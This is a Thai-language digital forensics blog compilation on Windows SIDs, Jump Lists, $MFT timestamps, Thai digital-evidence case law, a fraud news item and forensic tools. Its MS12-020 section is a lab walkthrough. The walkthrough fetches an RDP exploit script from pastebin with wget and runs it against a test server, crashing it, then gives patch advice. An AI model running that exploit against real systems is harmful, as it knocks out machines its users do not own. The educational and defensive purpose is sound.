DIGITAL FORENSICS: Security Identifier (SID)

DIGITAL FORENSICS: Security Identifier SID คือ

Security Identifier (SID) เป็นค่าที่ระบุถึง Object ประจำตัว User หรือ Account นั้น ๆ เพื่อใช้ระบุการรักษาความปลอดภัยในระบบปฏิบัติการ Windows (พูดง่าย ๆ คือเอาไว้เพื่อประกอบการตั้งค่าการควบคุมการเข้าถึงทรัพยากรในระบบ เช่นการใช้งาน Share Files หรือ ทรัพยากรอื่น ๆ ในระบบ)

WMIC

Get SID of user - Windows Command Line

wmic useraccount get name,sid

SID  wikihow.com

ตัวอย่าง SID Account ทั่วไป ของ System

S-1-1-0 Everyone

S-1-3-0 Creator Owner

S-1-5-1 Dialup

S-1-5-2 Network

S-1-5-3 Batch

S-1-5-4 Interactive

S-1-5-7 Anonymous

S-1-5-9 Enterprise Domain Controllers

S-1-5-11 Authenticated Users

S-1-5-13 Terminal Server Users

ตัวอย่าง SID Account ทั่วไปของ User

S-1-5-{Domain}-500 Administrator

S-1-5-{Domain}-501 Guest

S-1-5-{Domain}-512 Domain Admins

S-1-5-{Domain}-513 Domain Users

S-1-5-{Domain}-514 Guests

S-1-5-{Domain}-515 Domain Computers

S-1-5-{Domain}-516 Domain Controllers

S-1-5-{Domain}-518 Schema Admins

S-1-5-{Domain}-519 Enterprise Admins

S-1-5-{Domain}-544 Administrators

S-1-5-{Domain}-545 Users

http://www.mvpskill.com

S = ค่าของ String ที่ระบุว่าเริ่มต้น SID

1 = ค่า Version ของ SID นั้น ๆ

5 = ค่าระบุ Identifier

21-3273191534-3683084754-2821217130 = ค่า SID ของ Local Computer หรือ Domain Computer ประจำเครื่อง หรือ ประจำ Domain

500 = สิทธิของ SID นั้น ๆ เช่น 500 หมายถึงได้สิทธิเป็น Administrator (สามารถนำไปหาค่าได้จากตารางเบื้องต้นด้านบน)

ที่มา: By Suttipan Passornmvpskill  https://bit.ly/2Evrys3

        How to Find a User's Security Identifier (SID) in Windows

       Windows Registry Forensics

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น


* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#windowsforensics #WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

Digital Forensics: ตัวอย่างคดี พยานหลักฐานดิจิทัล

Digital Forensics:  ตัวอย่างคดี พยานหลักฐานดิจิทัล

Digital Forensics: Case Study 

#ความลับทางการค้า

      คำพิพากษาศาลฎีกาที่ 1323/2560
      พ.ร.บ.ความลับทางการค้า พ.ศ.2545 ม. 3
พ.ร.บ.ความลับทางการค้า พ.ศ.2545 มาตรา 3 บัญญัตินิยามของความลับทางการค้าว่า "ข้อมูลการค้าซึ่งยังไม่รู้จักกันโดยทั่วไป หรือยังเข้าถึงไม่ได้ในหมู่บุคคลซึ่งโดยปกติแล้วต้องเกี่ยวข้องกับข้อมูลดังกล่าว โดยเป็นข้อมูลที่มีประโยชน์ในเชิงพาณิชย์เนื่องจากเป็นความลับ และเป็นข้อมูลที่ผู้ควบคุมความลับทางการค้าได้ใช้มาตรการที่เหมาะสมเพื่อรักษาไว้เป็นความลับ" โจทก์จึงมีหน้าที่นำสืบว่าข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งตามฟ้อง ที่โจทก์กล่าวอ้างว่าเป็นความลับทางการค้า มีลักษณะครบถ้วนที่จะเป็นความลับทางการค้าตามที่มาตรา 3 ดังกล่าวกำหนดไว้ การที่พนักงานบริษัทโจทก์คนอื่นนอกเหนือจากจำเลยที่ 2 สามารถเข้าถึงข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งทั้งที่เป็นเอกสาร และเป็นข้อมูลในเครื่องคอมพิวเตอร์แสดงว่าโจทก์ไม่ได้ใช้มาตรการที่เหมาะสมเพื่อรักษาข้อมูลดังกล่าวไว้เป็นความลับ ข้อมูลเกี่ยวกับรายชื่อ ที่อยู่ และราคาค่าจ้างขนส่งตามฟ้องโจทก์ จึงไม่ใช่ความลับทางการค้า ตาม พ.ร.บ.ความลับทางการค้า พ.ศ.2545 มาตรา 3


#เค้าโครงบรรยาย  วิชา กฎหมายเกี่ยวกับอินเตอร์เน็ต  Download


#มาตรา 25 ธุรกรรมทางอิเล็กทรอนิกส์ใดที่ได้กระทำตามวิธีการแบบปลอดภัยที่กำหนดในพระราชกฤษฎีกา ให้สันนิษฐานว่าเป็น วิธีการที่เชื่อถือได้
#ว่าด้วยวิธีการแบบปลอดภัยในการทำธุรกรรมทางอิเล็กทรอนิกส์พ.ศ. ๒๕๕๓  Download

#การรับฟังและวิธีการนําสืบพยานหลักฐานอิเล็กทรอนิกส์ในคดีอาญา :ศึกษาตามพระราชบัญญัติว่าด้วยการกระทําความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. 2550 Donwload
 #พยานหลักฐานที่ได้มาจากเฟซบุ๊ก : คำพิพากษาฎีกาที่ 15386/2558  Download



ข้อสังเกต พยานหลักฐานที่ได้มาโดยวิธีการล่อให้กระทำความผิด (ENTRAPMENT)

คำพิพากษาศาลฎีกาที่ 4065/2545 และ 4301/2543

หน่วยที่ 12
    การรับฟังพยานหลักฐานในคดัอาญา ศาสตราจารย์พิเศษ ภัทรศักดิ์ วรรณแสง
ที่มา: https://bit.ly/2WBIS6g



#แห่แจ้งป.จับ นายหน้าประกันภัยรถ

คปภ.พร้อมตัวแทนบริษัทประกันภัย 10 บริษัท และผู้เสียหายถูกหลอกซื้อประกันภัยรถยนต์ 30 คน สูญกว่า 5 ล้านบาท โร่ร้องกองปราบฯ ให้ดำเนินคดีบริษัทนายหน้าหลอกขายประกันและสาวแสบตัวแทนขาย แฉเหยื่อหลงเชื่อ เพราะเห็นกับการผ่อนได้โดยไม่เสียดอกเบี้ยหรือเสนอขายในราคาถูก แนะให้หาข้อมูลบริษัทนายหน้าก่อน ตร.เตือน อย่าไปหลงเชื่อกับโปรโมชั่นพิเศษ

เหยื่อประกันภัยรถยนต์แจ้งจับบริษัทนายหน้าหลอกขายประกันและตัวแทนขาย เปิดเผยขึ้นที่กองบังคับการปราบปราม เมื่อเวลา 10.00 น. วันที่ 24 ม.ค. นายตนุภัทร รัตนพูลชัย รองเลขาธิการด้านกฎหมาย คดีและคุ้มครอง สำนักงานคณะกรรมการกำกับและส่งเสริมการประกอบธุรกิจประกันภัย (คปภ.) พร้อมตัวแทนบริษัทประกันภัย 10 บริษัท และผู้เสียหายถูกหลอกซื้อประกันภัยรถยนต์ 30 คน มูลค่าความเสียหาย 5 ล้านบาท เข้าพบ พ.ต.อ.ชาคริต สวัสดี รอง ผบก.ป. แจ้งความดำเนินคดีกับบริษัท ที.ไอ.เอส. ควอลิตี้ แมเนจเม้นท์ จำกัด และ น.ส.จุฑาภาส อังกาพย์ ฐานะกรรมการบริษัท ในฐานความผิดกระทำ การเป็นตัวแทนประกันวินาศภัยหรือนายหน้าประกัน วินาศภัยโดยไม่ได้รับอนุญาตจากนายทะเบียน โดยนำ เอกสารหลักฐานการโอนเงินของผู้เสียหาย มามอบให้พนักงานสอบสวนประกอบพิจารณาคดี

ที่มา:โดย ไทยรัฐฉบับพิมพ์
25 ม.ค. 2561 05:15 น.
https://bit.ly/2HYRX49

ทั้งนี้ จากการหารือของบริษัทประกันภัยที่ได้รับความเสียหายจากการกระทำของบริษัท ถูกกล่าวหา จำกัด มีความเห็นสอดคล้องกันว่า กรณีที่บริษัท ถูกกล่าวหา จำกัด กระทำการใช้เอกสารใบคำขอเอาประกันภัย ซึ่งไม่ใช่เอกสารของบริษัทประกันภัย เป็นการกระทำที่น่าจะเกิดความเสียหายแก่ผู้อื่นหรือประชาชน เป็นความผิดฐานปลอมเอกสาร ซึ่งบริษัทประกันภัยจะดำเนินการร้องทุกข์ต่อพนักงานสอบสวนต่อไป อีกทั้งบริษัทประกันภัยที่ได้รับความเสียหายจากกรณีที่บริษัท ถูกกล่าวหา จำกัด กระทำการใช้ตราสัญลักษณ์ของบริษัทลงโฆษณาในเว็บไซต์ www.ถูกกล่าวหา .com อาจทำให้ประชาชนเข้าใจผิดและหลงเชื่อว่าบริษัท ถูกกล่าวหา จำกัด เป็นตัวแทนหรือนายหน้าประกันภัยที่ได้รับมอบหมายจากบริษัท ซึ่งไม่เป็นความจริง เป็นความผิดตามมาตรา 14 (1) แห่งพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ (ฉบับที่ 2) พ.ศ. 2560 และบริษัทประกันภัยทุกบริษัทพร้อมที่จะดำเนินการตามกฎหมายกับบริษัท ถูกกล่าวหา จำกัด ให้ถึงที่สุด
 - ฉ้อโกงประชาชนและฟอกเงิน
- ข้อหาใช้หรือแสดงตัวเป็นประกันภัยโดยผิดกฎหมาย   
- เป็นนายหน้านิติบุคคลโดยไม่ได้รับอนุญาต 
- พรบคอม.
ที่มา:https://bit.ly/2HR1YRI
Download



หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#หลักฐานดิจิทัล #hashvalue #WindowsForensic #computerforensic #ComputerForensics #dfir #forensics #digitalforensics #investigation #cybercrime #fraud #พยานหลักฐานดิจิทัล

Digital Forensics:Jump list

Digital Forensics:Jump list

Jump list เป็นคุณลักษณะที่นำมาใช้ใน Windows 7 ช่วยให้คุณสามารถดูเอกสารล่าสุดในโปรแกรมที่ถูก Pin ไว้ที่ทาสก์บาร์ของคุณ รูปภาพเป็นตัวอย่างของJump listใน Windows 7 

Jump Lists ที่ว่านี่ จะเป็นรายการทางลัดการแสดงผลประวัติรายการที่เคยถูกเรียกใช้งานบ่อยๆ ไม่ว่าจะเป็นไฟล์เอกสาร Microsoft Office, เว็บเบราว์เซอร์, File Explorer, โปรแกรมมัลติมีเดีย, Text Editor ต่างๆ, ฯลฯ โดยเมื่อมีการเปิดเรียกใช้งานตัวโปรแกรม แล้วผู้ใช้งานสั่งคลิกขวาที่ทาสก์บาร์ ก็จะมีประวัติรายการรายชื่อไฟล์ที่เคยถูกเรียกใช้งานแสดงขึ้นมา

Jump list ทำหน้าที่เก็บรายการไฟล์ล่าสุดที่เราเรียกเปิดโปรแกรมต่างๆ มาว่าจะเป็นไฟล์เอกสาร ไฟล์เพลง ไฟล์วิดีโอ หรือไฟล์อื่นๆ เราเพียงคลิกขวาที่ไอคอน Windows Explorer ที่ Taskbar ก็จะเห็นรายการไฟล์ที่เรียกใช้ จุดประสงค์ของฟีเจอร์นี้ก็เพื่อให้ผู้ใช้คลิกเลือกไฟล์ที่เคยเปิดใช้แล้วที่นี่ ในกรณีที่ต้องการใช้ใหม่ในครั้งต่อไป จะได้รวดเร็วไม่ต้องไปคลิกที่ตัวไฟล์หรือโปรแกรม แต่ถ้าคุณเป็นคนที่ไม่ต้องการให้คนอื่นมาคลิกดูว่าคุณเคยเปิดใช้ไฟล์อะไรมาก่อน ก็สามารถเอาชื่อไฟล์ออกจากรายการได้

วิธีล้างรายการไฟล์ทำได้ดังนี้

ให้คลิกขวาที่ไอคอน Windows Explorer ที่ Taskbar ?จะมีรายการไฟล์แสดงออกมาให้คลิกขวาที่รายการที่ต้องการเอาออกเลือกคำสั่ง Remove form this list

 

รูปจาก notebookspec.com

 

ในกรณีที่ไม่ต้องการให้ Jump List จำค่าการใช้งานไฟล์เลย ก็ทำได้โดย ให้คลิกขวาที่ Taskbar เลือกคำสั่ง Properties ที่หน้าต่าง Taskbar Properties มาที่แท็บ Jump Lists ให้คลิกเอาเครื่องหมายถูกออกจาก

Store recently opened programs และ Store and display recently opened items in Jump Lists แล้วคลิก OK

 

รูปจาก notebookspec.com

 Jump List files are created on a per user basis, and located (the AppData directory is hidden by default from the user):
\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
‘%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations’

Episode 16: “Quick Win” files #2 - Jumplists-Part 1

Episode 17: “Quick Win” files #2 - Jumplists-Part 2

 

 

ref:

jumplist

notebookspec.com jump-list

forensic-analysis-of-windows-7-jump-lists/

windows-10-jump-list-forensics/ 

ศึกษาเพิ่มเติม Windows Artifacts Jump list(Part II)

#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น
* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

Digital Forensics:When a partition was created/Modify (Master File Table)

Digital Forensics:When a partition was created/Modify (Master File Table)

 วันนี้มาดูวิธีตรวจสอบ เวลาที่พาร์ติชั่นถูกสร้างขึ้นและวันเวลาที่ติดตั้ง windows

MFT หรือ Master File Table เป็นไฟล์ในระบบไฟล์แบบ NTFS โดยจะรวบรวมข้อมูลของไฟล์ รายละเอียดของไฟล์และไดเร็กทอรี่ทั้งหมด ในไดร์ฟนั้นๆ

ตัวอย่างที่ 1 $MFT  Master File Table   Date Create 26-3-2012

ตัวอย่างที่ 1 Windows XP 

$MFT  Master File Table   Date Create 26-3-2012

                                          Date Modify 26-3-2012

                                          Date Access 26-3-2012

โดยปกติไฟล์ $MFT จะถูกสร้างขึ้นโดยอัตโนมัติเมื่อมีการฟอร์แมตหรือเปลี่ยนพาร์ติชันของดิสก์เป็น NTFS โดยวันที่และเวลาที่ไฟล์ $MFT ถูกสร้างขึ้น (หรือวันที่และเวลาที่ดิสก์ถูกฟอร์แมต) จะถูกระบุอยู่ในคุณลักษณะของไฟล์ $MFT ที่หัวข้อ Date created ซึ่งในกรณีโดยส่วนใหญ่ที่ดิสก์ดังกล่าวถูกติดตั้งระบบปฏิบัติการ ไฟล์ของระบบปฏิบัติการจะมีวันที่และเวลาที่ถูกสร้างใกล้เคียงหรือสอดคล้องกับค่า Date created ใน $MFT ตามรูปภาพ ตัวอย่างที่ 1

Original Install Date:

Windows Original Install Date: 26-3-2012

ตัวอย่างที่ 2 Windows Original Install Date: 24-9-2019    

ตัวอย่างที่ 2  Windows 7 Professional 

$MFT  Master File Table   Date Create: 24-9-2019

           Windows Original Install Date:     24-9-2019                         

จุดสังเกต
 1 .  $MFT  Master File Table   (MAC TIme)
 2.  Systeminfo (Original Install Date)
 3.  Volume Serial Number  ของ Partition

อ่านเพิ่มเต้ิม

How to export Master File Table to csv

http://www.cse.scu.edu/~tschwarz/coen252_07Fall/Lectures/NTFS.html
how-to-extract-data-and-timeline-from-master-file-table-on-ntfs-filesystem/

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

IT Security: Security Update MS12-020 Remote Desktop

Microsoft Security Bulletin MS12-020 - Critical คือ ช่องโหว่ที่ร้ายแรง อนุญาตให้เรียกใช้โค้ดจากระยะไกลได้ หากผู้โจมตีส่งลำดับของแพ็กเก็ต RDP ที่ออกแบบมาเป็นพิเศษไปยังระบบที่ได้รับผลกระทบ โดยค่าเริ่มต้น Remote Desktop Protocol (RDP)

ทดสอบช่องโหว่  โดยเตรียมเครื่องมือดังนี้

• Kali
• Python2
• Windows2008
• RDPkill.py

Kali# wget -O RDPkill.py http://www.pastebin.com/raw.php?i=G99npvDy 

#chmod 777 RDPkill.py

File RDPkill.7z  ps: 1234 

#python (python2) RDPkill.py 192.168.18.131

ตรวจสอบเครื่องเป้าหมาย windows server 2008 IP: 192.168.18.131

ตรวจสอบว่าเครื่องเป้าหมาบเปิดการทำงาน Remote Desktop

# sudo python2 RDPkill.py 192.168.18.131

ผลการโจมตีทำให้เครื่องเป้าหมายขึ้น  Blue screen

แก้ไขโดย

Microsoft ได้ประกาศ Security Bulletin MS12-020 เพื่อ แจ้งเตือนผู้ใช้งานระบบปฏิบัติการ Windows ทุกเวอร์ชัน ให้ ทำการติดตั้งแพทช์ KB2621440 เพื่อแก้ไขปัญหาช่องโหว่ CVE-2012-0002 ซึ่งอนุญาตให้ผู้ไม่หวังดีส่งแพ็กเกจ RDP (Remote Desktop Protocol) เข้ามายังระบบ เพื่อสั่งให้ ประมวลผลคำสั่งที่ไม่พึงประสงค์จากระยะไกลได้ (Remote Code Execution) [10-1] อย่างไรก็ตาม ถึงแม้ว่าช่องโหว่ดังกล่าวได้ถูกแจ้งมายัง Microsoft โดยตรง และเชื่อว่า ไม่ได้มีการเปิดเผยราย

โดยออกคำแนะนำให้ติดตั้งลงบน Windows ทุกเครื่อง (แม้ว่าไม่ได้ enable RDP ก็ตาม)  ใน Update นี้ มี 2 ไฟล์ (KB2621440 และ KB2667402 )

ที่มา:     security-updates/securitybulletins/2012/ms12-020

                 

             Security-update-ms12-020

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

Digital Forensics:ถอดรหัสนิติวิทยาศาสตร์

Digital Forensics:ถอดรหัสนิติวิทยาศาสตร์

แนะนำหนังสือเรื่อง  ถอดรหัสนิติวิทยาศาสตร์

สืบเบาะแส ท้าคดี อาชญากรรมสุดระทึก!

ผู้เขียน    Alex Frith (อเล็กซ์ ฟริท)
ผู้แปล    พลอย สืบวิเศษ  

เนื้อหาโดยสังเขป
    หนังสือเล่มนี้อธิบายกระบวนการทำงานของนิติวิทยาศาสตร์ที่หลายคนคิดว่าเป็นเรื่องยากให้เข้าใจง่ายขึ้น ด้วยภาษาที่ไม่ซับซ้อน เนื้อหาที่กระชับ ความรู้แปลกใหม่ และการไขคดีอาชญากรรมที่ชวนทึ่งจากทั่วโลก สำหรับคนทั่วไปที่ไม่รู้จักเรื่องนิติวิทยาศาสตร์มาก่อน หนังสือเล่มนี้เหมาะแก่การศึกษา และหากใครที่สนใจเกี่ยวกับเรื่องนี้ "ถอดรหัสนิติวิทยาศาสตร์" เป็นหนังสืออีกเล่มที่ไม่ควรพลาดด้วยประการทั้งปวง      

สืบคดีสไตล์ CSI

รูปภาพจาก หนังสือ ถอดรหัสนิติวิทยาศาสตร์

• สารบัญ
• บทที่ 1 วิทยาศาสตร์และกฎหมาย
• บทที่ 2 สืบจากเหงื่อ
• บทที่ 3 ล้วงลับคราบเลือด
• บทที่ 4 ความลับในเซลล์
• บทที่ 5 ศพให้การ
• บทที่ 6 เงื่อนงำจากธรรมชาติ
• บทที่ 7 จิ๋วแต่แจ๋ว
• บทที่ 8 พุ่งไปกับกระสุนปืน
• บทที่ 9 ชำแหละระเบิด
• บทที่ 10 เบาะแสจากเอกสาร
• บทที่ 11 รูปพรรณของอาชญากร
• ฯลฯ

คำนิยม
ถอดรหัสนิติวิทยาศาสตร์ อธิบายกระบวนการทำงานของนิติวิทยาศาสตร์ที่หลายคนคิดว่าเป็นเรื่องยากให้เข้าใจง่ายขึ้น ด้วยภาษาที่ไม่ซับซ้อน เนื้อหาที่กระชับ ความรู้แปลกใหม่ และการไขคดีอาชญากรรมชวนทึ่งจากทั่วโลก
    -- แพทย์หญิง คุณหญิงพรทิพย์ โรจนสุนันท์ --
            ผู้อำนวยการสถาบันนิติวิทยาศาสตร์

การตามรอยทางอิเล็กทรนิกส์

               คนทั่วไปยังคงใช้ลายเซ็นป้องกันการปลอมแปลงเอกสาร แต่การเก็บข้อมูลสำคะญไว้ในคอมพิวเตอร์ก็เป็นสิ่งสำคัะญที่ทำกันมากขึ้น โดยมีการป้องกัน เช่น การใส่รหัส หรือ การใช้เลขรหัสประจำตัว (Personal Identifivation Number: PIN) เพื่อรักษาความปลอดภัย
     ช่วงสองทศวรรษที่ผ่านมา อาชญากรรมประเภทใหม่นี้เกิดขึ้นเป็นประจำ นั้นคื การฉ้อโองทางเล็กทรอนิกส์ (electronic fraud) ผู้รู้วิธีใช้คอมพิวเตอร์โดยเฉพาะการใช้อินเทอร์เน็ตสามารถสวนรวยเป็นบุคคลอื่นและเจาะฐานข้อมูลคอมพิวเตอร์ส่วนบุคคลเพื่อขโมยข้อมูล และนำไปเปิดเข้าระบบบัญชีธนาคารของคนหนึ่งเพื่อขโมยเงิ้นทั้งหมดได้
               นักนิติคอมพิวเตอร์ต้องมีความรู้เหนือกว่าอาชญากรคอมพิวเตอร์เสมอ โชคดีที่ส่วนใหญ่แล้วมักมีหลักฐานมากพอให้นักนิติคอมพิวเตอร์ตรวจสอบ ทุกครั้งที่มีคนใช้คอมพิวเตอร์ จะมีการบันทึกไว้ในหน่วยความจำเพื่อให้ตรวจสอบคำสั่งที่ใช้งานและเวลาที่ใช้ได้สำหรับคนส่วนใหญ่ ข้อมูลเหล่านี้อาจเป็นแค่ตัวอักษรที่อ่านไม่เข้าใจ แต่ผู้เชี่ยวเข้าใจข้อมูลเหล่านี้
               แม้จะลบข้อมูลในหน่วยความจำของคอมพิวเตอร์ไปแล้ว ตราบใดที่ยังไม่มีการใส่ข้อมูลใหม่  หรือคอมพิวเตอร์ยังไม่ถูกทำลาย ข้อมูลเหล่านี้ยังคงอยู่  นักวิทยาศาสตร์ตรวจสอบวงจรคอมพิวเตอร์เพื่อระบุคำสั่งที่ใช้เมื่อเร็วๆนี้  และกู้แฟ้มเอกสารที่ถูกลบทิ้งได้  การค้นหาข้อมูลเพื่อตรวจหาหลักฐานที่เป็นประโยชน์นับเป็นศาสตร์อย่างหนึ่งเรียกว่า การกู้ข้อมูล (information retrieval)
               นักนิติคอมพิวเตอร์อีกส่วนหนึ่งคอยตรวจสอบการใช้งานบนอินเทอร์เน็ต โดยตรวจเว็บไซต์ที่น่าสงสัยหรือผิดกฎหมายเพื่อหาตัวคนเปิดเว็บไซต์และยังตรวจสอบคอมพิวเตอร์ของผู้สงสัยเพื่อดูรายชื่อเว็บไซต์ที่ผู้สงสัยเข้าไปดูได้  เช่น ตรวจสอบว่าผู้ต้องสงสัยเป็นสมาชิกกลุุ่มก่อการร้ายหรือไม่

โจรเคราะห์ร้าย
โทรศัพท์รุ่นใหม่มักมีระบบติดตามบอกตำแหน่ง (Global Positioning System : GPS) ซึ่งชิปที่เจ้าของเครื่องสามาถเปิดทำงานเพื่อบอกตำแหน่งที่อยู่ได้นอกจากนี้ยังมีประโยชน์ต่อการตามหาเครื่องโทรศัพท์ได้ด้วย เหมือนที่จอห์น บีย์รเล ทูตชาวเอมริกัน พบโทรศัพท์ของเขาในสนามบินบัลแกเรีย เมือ ค.ศ 2005

รูปภาพจาก หนังสือ ถอดรหัสนิติวิทยาศาสตร์

ที่มา:
se-ed ถอดรหัสนิติวิทยาศาสตร์ 
ถอดรหัสนิติวิทยาศาสตร์

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WindowsForensic #ComputerForensics #dfir #forensics #digitalforensics #computerforensic #investigation #cybercrime #fraud

Digital Forensics: Search by Image

Digital Forensics: วิธีค้นหาด้วยรูปภาพที่คล้ายกัน บน Google Image

Star Wars Episode I

Reverse.photos — upload an image and find similar pictures on the web.

• โดยเปิดเว็บเบราว์เซอร์ (เช่น IE , Safari, Chrome) แล้วไปที่อยู่เว็บ mobile-reverse-image-search  ก็จะเข้าสู่หน้า Search By Image  
• จากนั้น แตะที่ [ UPLOAD ] มือถือของคุณก็จะเปิดแอพ Gallery (รูปภาพ) ให้คุณเลือกภาพถ่าย หรือภาพที่คุณเคย save บนมือถือ เลือกมาสักรูปนึง

Reverse.photos

Show Matches

• เมื่อเลือกภาพเสร็จแล้วให้แตะที่ [ SHOW MATACHES ] เพื่อค้นหาภาพคล้ายได้เลย ก็จะแสดงผลลัพธ์ภาพคล้ายกันกับภาพที่คุณเลือก บนมือถือของคุณ วิธีนี้สามารถตรวจสอบที่มาของภาพคล้ายกัน นี้ได้ผ่านทางมือถือได้ทันที

Search by Image

 Ref.  TheNextWeb , it24hrs 

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง Admin เพื่อแก้ไขต่อไป
ขอบคุณครับ

#WindowsForensic #computerforensic #ComputerForensics #dfir #forensics
#digitalforensics #investigation #cybercrime #fraud

Digital Forensics:Forensic Tools

Computer Forensic Tools

      

Disk tools and data capture

Name	From	Description
DumpIt	MoonSols	Generates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
EnCase Forensic Imager	Guidance Software	Create EnCase evidence files and EnCase logical evidence files [direct download link]
Encrypted Disk Detector*	Magnet Forensics	Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
EWF MetaEditor	4Discovery	Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
FAT32 Format	Ridgecrop	Enables large capacity disks to be formatted as FAT32
Forensics Acquisition of Websites	Web Content Protection Association	Browser designed to forensically capture web pages
FTK Imager*	AccessData	Imaging tool, disk viewer and image mounter
Guymager	vogu00	Multi-threaded GUI imager under running under Linux
HotSwap	Kazuyuki Nakayama	Safely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area
LiveView	CERT	Allows examiner to boot dd images in VMware.
P2 Explorer Free	Paraben	Mount forensic images as read-only local logical and physical disks
Live RAM Capturer*	Belkasoft	Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
OSFClone	Passmark Software	Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
OSFMount	Passmark Software	Mounts a wide range of disk images. Also allows creation of RAM disks
Tableau Imager*	Tableau	Imaging tool for use with Tableau imaging products
VHD Tool	Microsoft	Converts raw disk images to VHD format which are mountable in Windows Disk Management

Email analysis

Name	From		Description
EDB Viewer		Lepide Software	Open and view (not export) Outlook EDB files without an Exchange server
Mail Viewer		MiTeC	Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
OST Viewer		Lepide Software	Open and view (not export) Outlook OST files without connecting to an Exchange server
PST Viewer		Lepide Software	Open and view (not export) Outlook PST files without needing Outlook

General

Name	From	Description
Agent Ransack	Mythicsoft	Search multiple files using Boolean operators and Perl Regex
CaseNotes Lite	Blackthorn	Contemporaneous notes recorder
Computer Forensic Reference Data Sets	NIST	Collated forensic images for training, practice and validation
EvidenceMover*	Nuix	Copies data between locations, with file comparison, verification, logging
FastCopy	Shirouzu Hiroaki	Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
File Signatures	Gary Kessler	Table of file signatures
HashMyFiles	Nirsoft	Calculate MD5 and SHA1 hashes
MobaLiveCD	Mobatek	Run Linux live CDs from their ISO image without having to boot to them
Mouse Jiggler	Arkane Systems	Automatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++	Notepad ++	Advanced Notepad replacement
NSRL	NIST	Hash sets of ‘known’ (ignorable) files
Quick Hash	Ted Technology	A Linux & Windows GUI for individual and recursive SHA1 hashing of files
USB Write Blocker	DSi	Enables software write-blocking of USB ports
USB Write Blocker	Sécurité Multi-Secteurs	Software write blocker for Windows XP through to Windows 8
Windows Forensic Environment	Troy Larson	Guide by Brett Shavers to creating and working with a Windows boot CD

File and data analysis

Name	From	Description
Advanced Prefetch Analyser	Allan Hay	Reads Windows XP,Vista and Windows 7 prefetch files
analyzeMFT	David Kovar	Parses the MFT from an NTFS file system allowing results to be analysed with other tools
Defraser	Various	Detects full and partial multimedia files in unallocated space
eCryptfs Parser	Ted Technology	Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption Analyzer	Passware	Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
ExifTool	Phil Harvey	Read, write and edit Exif data in a large number of file types
Forensic Image Viewer	Sanderson Forensics	View various picture formats, image enhancer, extraction of embedded Exif, GPS data
Highlighter	Mandiant	Examine log files using text, graphic or histogram views
Link Parser	4Discovery	Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
LiveContactsView	Nirsoft	View and export Windows Live Messenger contact details
RSA Netwitness Investigator*	EMC	Network packet capture and analysis
Memoryze	Mandiant	Acquire and/or analyse RAM images, including the page file on live systems
